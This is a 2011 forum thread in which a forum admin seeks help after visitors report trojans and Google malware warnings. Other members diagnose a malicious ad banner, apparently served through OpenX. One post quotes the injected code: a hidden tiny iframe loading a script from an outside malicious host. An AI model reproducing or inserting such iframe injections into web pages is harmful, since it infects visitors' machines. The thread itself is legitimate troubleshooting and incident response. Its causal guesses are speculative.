1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

My site's been hacked..

Discussion in 'Off Topic' started by dutchbb, Jan 4, 2011.

  1. dutchbb

    dutchbb Well-Known Member

    Ok someone managed to find a leak in our site and inserted malicious code somehow.

    Here's a screen of the code inserted:


    As you can see it's right after the body tag and right before the yui JS.

    I'm using the following scripts:

    * vBulletin 3.8.5
    * OpenX v2.8.6
    * Photopost 7.03
    * Reviewpost 5.1
    * vBSEO 3.5.2

    I've been looking for the leak / code but can't seem to find anything. Any help is appreciated.
  2. Vincent

    Vincent Well-Known Member

    Virusses in forums? Never heard of that
  3. Lu Kas

    Lu Kas Active Member

    can you post a link?
  4. Walter

    Walter Well-Known Member

  5. dutchbb

    dutchbb Well-Known Member

    http://forum.dutchbodybuilding.com/ make sure you have some anti-virus running. The problem is; it seems to pop up irregularly. I'm not sure what to make of it.

    I posted in that thread, have been hacked too. But we're running the latest version of OpenX now. I really don't know where these viruses are coming from. I haven't seen any warnings myself, members say they get multiple trojans on their computers whilst browsing the forums...
  6. D.O.A.

    D.O.A. Well-Known Member

    Just got two java exploits when I checked your site out, and googles slapped up the warning page first :/
  7. dutchbb

    dutchbb Well-Known Member

    Oh Google warning again too huh :(

    I would appreciate if anyone can provide me with the source code of the page with the warning, maybe it shows some clue to the location.
  8. D.O.A.

    D.O.A. Well-Known Member

    I'm looking in your index source now as that's where it hit me from.
  9. D.O.A.

    D.O.A. Well-Known Member

    <iframe width="2" height="1" frameborder="0" src="http://alsonatural.cz.cc/46vx79bo/counter.php?id=4"></iframe>
    I see hell in there. Something, a banner maybe, is injecting the iframe.
  10. D.O.A.

    D.O.A. Well-Known Member

    dutchbb likes this.
  11. dutchbb

    dutchbb Well-Known Member

    Thanks. I can't find that code anywhere though. Not sure where it's located and how it got there :s
  12. D.O.A.

    D.O.A. Well-Known Member

    One of your banners for sure. Or, and I doubt it, your server got hacked and it's a script working from there.

    I'm betting bad advertising ;D

    remove all banners and run some tests, add them back until you find the culprit or follow the source of each.
  13. dutchbb

    dutchbb Well-Known Member

    Banners disabled. Does it persist?

    Seriously if it's OpenX again I'll stop using it, that would be the third time it got hacked.
  14. D.O.A.

    D.O.A. Well-Known Member

    It was the top banner I'm guessing, when i checked your site out there was a hidden iframe in the top left hand corner of your website, beside the main banner. Now it's gone and I can access your site, and the code is clean.

    Does openX act as a ad server rotating banners on your site? (I dont know what openX is) It's possible one of the ads was infected and that's why only sometimes your users were affected, when that specific banner ad rotated in.

    Adbrite was notorious for that ****, they took on some nasty advertisers for a while there.
  15. Carlos

    Carlos Well-Known Member

    This is happening to sites using OpenX ads. In fact, a blog used to have OpenX ads, and my antivirus was able to catch it, and I was able to close it before it did anything.

    Its not just forums. Its all kinds of sites.

    I think its best just to forget doing business with OpenX, at all.
  16. Kaiser

    Kaiser Well-Known Member

    i get the google warning, and in the warning it says "containts elements from alsonatural.cz.cc" where im assuming you might have some images from there, such as in a banner or sig or etc. Your site probably isnt hacked just the site that i mentioned is brining up the warnings.
  17. dutchbb

    dutchbb Well-Known Member

    Yes OpenX is an ad server, but these are our own banners or from advertisers we know. I'm going to look in the OpenX files if I can find anything in there.

    @Carlos: yeah probably. They just can't seem to get their code secure and everything is up to date. Thanks guys.
  18. motowebmaster

    motowebmaster Active Member

    Do you use a firewall in front of your server, and are you using the standard OpenX setup?
  19. AdamD

    AdamD Well-Known Member

    A site I visit on occasion had a similiar problem, but it wasn't related to the ad software

    Somehow, malicious iframe code was being inserted into the forum templates.

    They were running an older version of VB 3.8
  20. Dean

    Dean Well-Known Member

    Because this is obviously extremely important to many, any further detail regarding this would be great.

    Was the banner that caused problems hosted on your server?
    In your opinion, is there a 'safe' way to use open x? for instance having all banners on the server?

    Just curious if you had any further thoughts, I've not used openx.

Share This Page